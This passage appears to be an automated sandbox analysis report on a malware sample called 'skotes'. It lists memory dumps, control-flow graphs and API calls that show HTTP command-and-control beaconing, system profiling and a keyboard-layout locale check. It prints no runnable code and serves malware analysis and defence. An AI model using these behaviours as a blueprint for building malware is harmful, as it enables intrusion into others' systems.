                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesFile$CreateDirectory
                                                                                                                                                                                            • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1f$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                            • API String ID: 1875963930-4171456581
                                                                                                                                                                                            • Opcode ID: 93f2b3828eebfefaabaf16e4c9d4f1f5e624c327fe7d9a981fcadf28b1645cf5
                                                                                                                                                                                            • Instruction ID: 7cd829d2a91ef0b4beab9737118d74c912e0b80e5a36cdbb4a71680fa83d8825
                                                                                                                                                                                            • Opcode Fuzzy Hash: 93f2b3828eebfefaabaf16e4c9d4f1f5e624c327fe7d9a981fcadf28b1645cf5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7FF21771A101489BEF1CDB28CD897DEBB739F81304F18829CE409A73D6DB759AC48B95

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 985 60be30-60be7c 986 60c281-60c2a6 call 6180c0 985->986 987 60be82-60be86 985->987 992 60c2d4-60c2ec 986->992 993 60c2a8-60c2b4 986->993 987->986 989 60be8c-60be90 987->989 989->986 991 60be96-60bf2a Sleep InternetOpenW InternetConnectA call 617a00 call 605c10 989->991 1015 60bf2c 991->1015 1016 60bf2e-60bf4a HttpOpenRequestA 991->1016 997 60c2f2-60c2fe 992->997 998 60c238-60c250 992->998 995 60c2b6-60c2c4 993->995 996 60c2ca-60c2d1 call 61d663 993->996 995->996 1000 60c34f-60c354 call 636c6a 995->1000 996->992 1002 60c304-60c312 997->1002 1003 60c22e-60c235 call 61d663 997->1003 1004 60c323-60c33f call 61cff1 998->1004 1005 60c256-60c262 998->1005 1002->1000 1011 60c314 1002->1011 1003->998 1012 60c268-60c276 1005->1012 1013 60c319-60c320 call 61d663 1005->1013 1011->1003 1012->1000 1021 60c27c 1012->1021 1013->1004 1015->1016 1022 60bf7b-60bfea call 617a00 call 605c10 call 617a00 call 605c10 1016->1022 1023 60bf4c-60bf5b 1016->1023 1021->1013 1037 60bfec 1022->1037 1038 60bfee-60c004 HttpSendRequestA 1022->1038 1025 60bf71-60bf78 call 61d663 1023->1025 1026 60bf5d-60bf6b 1023->1026 1025->1022 1026->1025 1037->1038 1039 60c035-60c05d 1038->1039 1040 60c006-60c015 1038->1040 1043 60c08e-60c0af InternetReadFile 1039->1043 1044 60c05f-60c06e 1039->1044 1041 60c017-60c025 1040->1041 1042 60c02b-60c032 call 61d663 1040->1042 1041->1042 1042->1039 1048 60c0b5 1043->1048 1046 60c070-60c07e 1044->1046 1047 60c084-60c08b call 61d663 1044->1047 1046->1047 1047->1043 1051 60c0c0-60c170 call 634250 1048->1051
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(000005DC,8FC8FEA1,?,00000000), ref: 0060BEB8
                                                                                                                                                                                            • InternetOpenW.WININET(00658DC8,00000000,00000000,00000000,00000000), ref: 0060BEC7
                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0060BEEC
                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,00000000), ref: 0060BF36
                                                                                                                                                                                            • HttpSendRequestA.WININET(?,00000000), ref: 0060BFF6
                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000003FF,?), ref: 0060C0A8
                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0060C187
                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0060C18F
                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0060C197
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                                                                                            • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                            • API String ID: 2167506142-885246636
                                                                                                                                                                                            • Opcode ID: 501fcd079ccc68c3ff2bb430a0c2cf9fcb554ee3f7f2a86fa1d87e7cf15423b0
                                                                                                                                                                                            • Instruction ID: 369e64662831844bc612814a1034000a9474b16a2418f0da20e2c9fc956ae4b2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 501fcd079ccc68c3ff2bb430a0c2cf9fcb554ee3f7f2a86fa1d87e7cf15423b0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BB1F2B06501189BDB28CF28CC88BDEBB76EF45314F5086D9F509972C2DB719AC4CB98

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1425 606020-60619d call 61e150 call 6180c0 * 5 RegOpenKeyExA 1438 6064b1-6064ba 1425->1438 1439 6061a3-606233 call 6340f0 1425->1439 1440 6064e7-6064f0 1438->1440 1441 6064bc-6064c7 1438->1441 1462 606239-60623d 1439->1462 1463 60649f-6064ab 1439->1463 1445 6064f2-6064fd 1440->1445 1446 60651d-606526 1440->1446 1443 6064c9-6064d7 1441->1443 1444 6064dd-6064e4 call 61d663 1441->1444 1443->1444 1450 6065d7-6065df call 636c6a 1443->1450 1444->1440 1452 606513-60651a call 61d663 1445->1452 1453 6064ff-60650d 1445->1453 1448 606553-60655c 1446->1448 1449 606528-606533 1446->1449 1458 606585-60658e 1448->1458 1459 60655e-606569 1448->1459 1455 606535-606543 1449->1455 1456 606549-606550 call 61d663 1449->1456 1452->1446 1453->1450 1453->1452 1455->1450 1455->1456 1456->1448 1468 606590-60659f 1458->1468 1469 6065bb-6065d6 call 61cff1 1458->1469 1466 60657b-606582 call 61d663 1459->1466 1467 60656b-606579 1459->1467 1471 606243-606279 RegEnumValueA 1462->1471 1472 606499 1462->1472 1463->1438 1466->1458 1467->1450 1467->1466 1476 6065b1-6065b8 call 61d663 1468->1476 1477 6065a1-6065af 1468->1477 1480 606486-60648d 1471->1480 1481 60627f-60629e 1471->1481 1472->1463 1476->1469 1477->1450 1477->1476 1480->1471 1486 606493 1480->1486 1485 6062a0-6062a5 1481->1485 1485->1485 1487 6062a7-6062fb call 6180c0 call 617a00 * 2 call 605d50 1485->1487 1486->1472 1487->1480
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0060617D
                                                                                                                                                                                            • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00606271
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EnumOpenValue
                                                                                                                                                                                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                            • API String ID: 2571532894-3963862150
                                                                                                                                                                                            • Opcode ID: 4c87324e6f48f5f247ee70ea9a9fcab0febeb38dbb22fc82fa379e70ca663ce2
                                                                                                                                                                                            • Instruction ID: 914309c748cf813fee89d10b24e30907e2b9a797cb5b68b51f545cba0813caa3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c87324e6f48f5f247ee70ea9a9fcab0febeb38dbb22fc82fa379e70ca663ce2
                                                                                                                                                                                            • Instruction Fuzzy Hash: BBB1BF719401689BDB25DB14CC89BDEB7BAAF04300F4442D8F508E72D2DB749BE88F94

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1498 607d30-607db2 call 6340f0 1502 608356-608373 call 61cff1 1498->1502 1503 607db8-607de0 call 617a00 call 605c10 1498->1503 1510 607de2 1503->1510 1511 607de4-607e06 call 617a00 call 605c10 1503->1511 1510->1511 1516 607e08 1511->1516 1517 607e0a-607e23 1511->1517 1516->1517 1520 607e54-607e7f 1517->1520 1521 607e25-607e34 1517->1521 1524 607eb0-607ed1 1520->1524 1525 607e81-607e90 1520->1525 1522 607e36-607e44 1521->1522 1523 607e4a-607e51 call 61d663 1521->1523 1522->1523 1526 608374 call 636c6a 1522->1526 1523->1520 1530 607ed3-607ed5 GetNativeSystemInfo 1524->1530 1531 607ed7-607edc 1524->1531 1528 607e92-607ea0 1525->1528 1529 607ea6-607ead call 61d663 1525->1529 1539 608379-60837f call 636c6a 1526->1539 1528->1526 1528->1529 1529->1524 1535 607edd-607ee6 1530->1535 1531->1535 1537 607f04-607f07 1535->1537 1538 607ee8-607eef 1535->1538 1543 6082f7-6082fa 1537->1543 1544 607f0d-607f16 1537->1544 1541 608351 1538->1541 1542 607ef5-607eff 1538->1542 1541->1502 1546 60834c 1542->1546 1543->1541 1549 6082fc-608305 1543->1549 1547 607f18-607f24 1544->1547 1548 607f29-607f2c 1544->1548 1546->1541 1547->1546 1551 607f32-607f39 1548->1551 1552 6082d4-6082d6 1548->1552 1553 608307-60830b 1549->1553 1554 60832c-60832f 1549->1554 1557 608019-6082bd call 617a00 call 605c10 call 617a00 call 605c10 call 605d50 call 617a00 call 605c10 call 605730 call 617a00 call 605c10 call 617a00 call 605c10 call 605d50 call 617a00 call 605c10 call 605730 call 617a00 call 605c10 call 617a00 call 605c10 call 605d50 call 617a00 call 605c10 call 605730 call 617a00 call 605c10 call 617a00 call 605c10 call 605d50 call 617a00 call 605c10 call 605730 1551->1557 1558 607f3f-607f9b call 617a00 call 605c10 call 617a00 call 605c10 call 605d50 1551->1558 1555 6082e4-6082e7 1552->1555 1556 6082d8-6082e2 1552->1556 1559 608320-60832a 1553->1559 1560 60830d-608312 1553->1560 1561 608331-60833b 1554->1561 1562 60833d-608349 1554->1562 1555->1541 1564 6082e9-6082f5 1555->1564 1556->1546 1597 6082c3-6082cc 1557->1597 1583 607fa0-607fa7 1558->1583 1559->1541 1560->1559 1566 608314-60831e 1560->1566 1561->1541 1562->1546 1564->1546 1566->1541 1585 607fa9 1583->1585 1586 607fab-607fcb call 638bbe 1583->1586 1585->1586 1592 608002-608004 1586->1592 1593 607fcd-607fdc 1586->1593 1592->1597 1598 60800a-608014 1592->1598 1595 607ff2-607fff 